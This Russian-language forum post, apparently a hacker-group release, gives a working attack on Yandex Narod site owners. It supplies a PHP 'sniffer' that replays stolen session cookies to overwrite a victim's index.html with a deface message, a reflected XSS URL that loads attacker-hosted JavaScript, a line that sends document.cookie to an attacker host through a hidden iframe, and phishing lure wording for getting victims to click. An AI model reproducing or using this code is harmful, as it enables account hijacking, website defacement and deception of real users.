quote:


При исследовании сервиса narod.yandex.ru, видно, что для того, чтобы заменить исходный index.html, да и вообще, править в "Мастерской", подтверждения пароля не требуется, достаточно только кукисов, что уже очень хорошо. Сразу хочу заметить, что способ прокатит только в том случае, если пользователь использует почту привязанную к данному(своему) сайту и домену. Т.е. например, для сайта xsslab.narod.ru, он пользует мыло xsslab.yandex.ru или xsslab.narod.ru.
Посему, отправив пользователю письмо с XSS скриптом, можно получить на сниффер его куки, и успешно авторизировавшись(подставив куки) задефейсить сайт(куки как ты понял во всех субдоменах яндекса одинаковы). Все вроде бы и хорошо, но вот что будет, если пользователь зайдет в свой ящик, попадет на XSS`ку, отошлет свои куки тебе на снифф, но ты, по каким либо причинам, просто не успееш авторизироватся под данной сессией? Вот для такого случая и напишем функциональный сниффер, который сделает за нас всю грязную работу.

[Пишем функциональный снифф]
Прежде, зальем на хост поддерживающий исходящие соединения такой вот php скрипт:
PHP код:
<?
// PinkPanther [PinkPanther@HackZona.ru]
// official HackZona TeaM release

$query=$_SERVER["QUERY_STRING"];
$query=urldecode($query);
$def=" defaced by PinkPanther special for HackZona.ru";
$site="site_kotoriy_nado_zadefit_bez_http";
$post="previewprefix=%3Cbase+href%3D%27http%3A%2F%2F".$site."
%2F%27%3E&html_text=".$def."
&inittext=&f=index.html&save=1&savebut.x=17&savebut .y=6";
$d=strlen($post);
$header="POST /filemanager/teditor.xhtml HTTP/1.0 ";
$header.="Referer: http://narod.yandex.ru/filemanager/teditor.xhtml?f=index.html&random_nocache=1247494384e38518362 ";
$header.="Content-Type: application/x-www-form-urlencoded ";
$header.="Host: narod.yandex.ru ";
$header.="Content-Length: $d ";
$header.="Cookie: ".$query." ";
$header.=" ";
$header.=$post;
$fp=fsockopen("narod.yandex.ru", 80);
fwrite($fp, $header);
fclose($fp);
?>
Вот на этот скрипт нам и надо посылать кукисы. Напомню, он должен находится на хосте с поддержкой рнр, и хост этот, должен разрешать исходящие соединения.

[Сама XSS`ка]
Активную XSS Я Вам не скажу, это приват античата, а сделаем мы лучше так…..
Возьмем пассивныю XSS например тут:
код:
http://narod.yandex.ru/rubrics/top100.xhtml?sort=pink>[XSS]

и модифицируем ее таким вот образом:
код:
http://narod.yandex.ru/rubrics/top100.xhtml?sort=
pink%3E%3C%2Fa%3E%3Cscript%20src=%22http://host_s_soketami/f.js%22%3E%3C%2Fscript%3E

Это нам облегчит жизнь в дальнейшем.
Теперь, загоним в f.js например, такие вот строки и зальем его на наш хост.
JаvaScrірt код:
document.write('<iframe width=0 height=0 src="'+'http://host_s_soketami/1.php'+'?'+document . cookie+'"></iframe>');

где 1.рнр-это файл в самом начале моей статьи. Tеперь создадим страницу на народе, куда впишем такой вот код:
JаvaScrірt код:
<iframe src="http://narod.yandex.ru/rubrics/top100.xhtml?sort=
pink%3E%3C%2Fa%3E%3Cscript%20src=%22http://host_s_soketami/f.js%22%3E%3C%2Fscript%3E" height=0 width=0>

Вот и все! Теперь отправим юзеру письмо с ссылкой на наш сайт. Это гениально, ибо если б мы просто направили ему ссылку, то он бы фиг прошелся бы по ней, ибо ща люди поумнели, а насчет сайта, пишем в письме :"Заработай 15 баксо за клик" и юзер хоть и не клюнет, но 50% даю что пройдется, а теперь вспомни, сколько людей проходят по ссылке перед этим разлогиниваясь из почтового аккаунта. Можно конечно в теге урл подменить сайт, и светить не народ а, например, майкрософт, короче тут можно копать и копать……